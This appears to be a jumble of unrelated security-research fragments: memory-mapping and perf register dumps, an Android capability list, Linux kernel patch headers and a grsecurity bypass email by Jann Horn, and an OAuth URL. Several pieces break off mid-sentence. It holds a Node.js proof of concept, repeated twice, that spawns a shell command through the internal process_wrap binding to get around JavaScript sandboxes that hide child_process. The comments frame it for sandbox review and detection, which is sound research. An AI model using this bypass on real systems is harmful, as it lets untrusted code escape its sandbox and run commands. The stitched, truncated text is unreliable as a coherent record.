0x0 Twux 0x7aa7000
0x0 Twux 0x8b4bf000
0x400000 Twux 0x77c9000
0x400000 P-ux 0x11f46000
0x600000 Twux 0x72da000
0x600000 P-u- 0x11f47000L
0x601000 Pwu- 0x11ec8000L
0x1e00000 Twux 0x79fb000
0x1f13000 Pwu- 0x11f7a000L
0x1f14000 Pwu- 0x11f7b000L
$ ./perf_sample_regs_intr_demo
data_head is at ff0
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0x4005b0
rax=0xfffffffffffffff7 rbp=0xffffa5fc43efff48 rsp=0xffffa5fc43efff28 rip=0xffffffff97c55f1d
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0xffff8fc3ba3b79c0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef0 rip=0xffffffff97c745c9
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0x0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef8 rip=0xffffffff97c75049
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce15
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040c0 rip=0x4007d5
init root allcaps
ueventd root allcaps
logd CAP_AUDIT_CONTROL CAP_SYSLOG
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
debuggerd root allcaps
debuggerd64 root allcaps
vold root allcaps
debuggerd64:sig root allcaps
debuggerd:sig root allcaps
// Proof of concept: spawn a process through Node's internal `process_wrap`
// binding directly, bypassing the public `child_process` module entirely.
// NOTE(review): relevant when sandboxing JS — a policy that only hides
// `child_process` does not cover this path while `process.binding` remains
// reachable; confirm against the sandbox in question.
var Process = process.binding('process_wrap').Process;
var proc = new Process();
// Exit handler is a deliberate no-op; the exit status is not inspected.
proc.onexit = function(a,b) {};
// Flatten the current environment into "KEY=VALUE" strings, the shape the
// binding takes as `envPairs` below.
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
// Runs `id > /tmp/owned` via /bin/sh with stdin/stdout/stderr all ignored;
// presumably the presence of /tmp/owned is the success indicator. For
// detection, the resulting process tree is `sh -c` spawned directly by the
// node process.
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
From cd0bd8ae7e4afb8050657b73d65e3ddeccd44b9b Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Sat, 12 Dec 2015 02:59:28 +0100
Subject: [PATCH] drivers/tty: add protected_ttys sysctl
This new fs.protected_ttys sysctl can be set to 1 to require
CAP_SYS_ADMIN for the TIOCSTI ioctl (which lets the caller
push input back into the TTY and thereby fake input to other
processes that read from the same TTY).
// Proof of concept: spawn a process through Node's internal `process_wrap`
// binding directly, bypassing the public `child_process` module entirely.
// NOTE(review): relevant when sandboxing JS — a policy that only hides
// `child_process` does not cover this path while `process.binding` remains
// reachable; confirm against the sandbox in question.
var Process = process.binding('process_wrap').Process;
var proc = new Process();
// Exit handler is a deliberate no-op; the exit status is not inspected.
proc.onexit = function(a,b) {};
// Flatten the current environment into "KEY=VALUE" strings, the shape the
// binding takes as `envPairs` below.
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
// Runs `id > /tmp/owned` via /bin/sh with stdin/stdout/stderr all ignored;
// presumably the presence of /tmp/owned is the success indicator. For
// detection, the resulting process tree is `sh -c` spawned directly by the
// node process.
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
Date: Sun, 28 Feb 2016 19:08:22 +0100
From: Jann Horn <jann@thejh.net>
To: Brad Spengler <spender@grsecurity.net>
Subject: GRKERNSEC_PTRACE_READEXEC bypasses
Hi!
While writing some new kernel documentation (not yet public, but will probably
soon be under Documentation/security/ptrace_checks.txt), I noticed that
GRKERNSEC_PTRACE_READEXEC has some issues.
From 712e7f2f67476986498dd8f1db332a62852ebdf0 Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Sat, 2 Jan 2016 08:09:19 +0100
Subject: [PATCH] fs: allow unprivileged chroot()
Allow unprivileged processes to chroot() themselves, under the
following conditions:
- The caller must have set NO_NEW_PRIVS to prevent him from
invoking setuid/setgid/setcap executables in the chroot that
From 7f1265b917aba4436653aa8e7bf90976b82b77ee Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Fri, 14 Aug 2015 17:47:01 +0200
Subject: [PATCH] drivers/tty: require read access for controlling terminal
This is mostly a hardening fix, given that write-only access to other
users' ttys is usually only given through setgid tty executables.
Signed-off-by: Jann Horn <jann@thejh.net>
---
https://accounts.google.com/o/oauth2/auth?client_id=243086291405-p1p6s7gq8rtijh3g9cppo85rl5pf17gv.apps.googleusercontent.com&response_type=code&scope=openid%20email&redirect_uri=https://thejh.net/&state=security_token%3D138r5719ru3e1%26url%3Dhttps://thejh.net/&prompt=none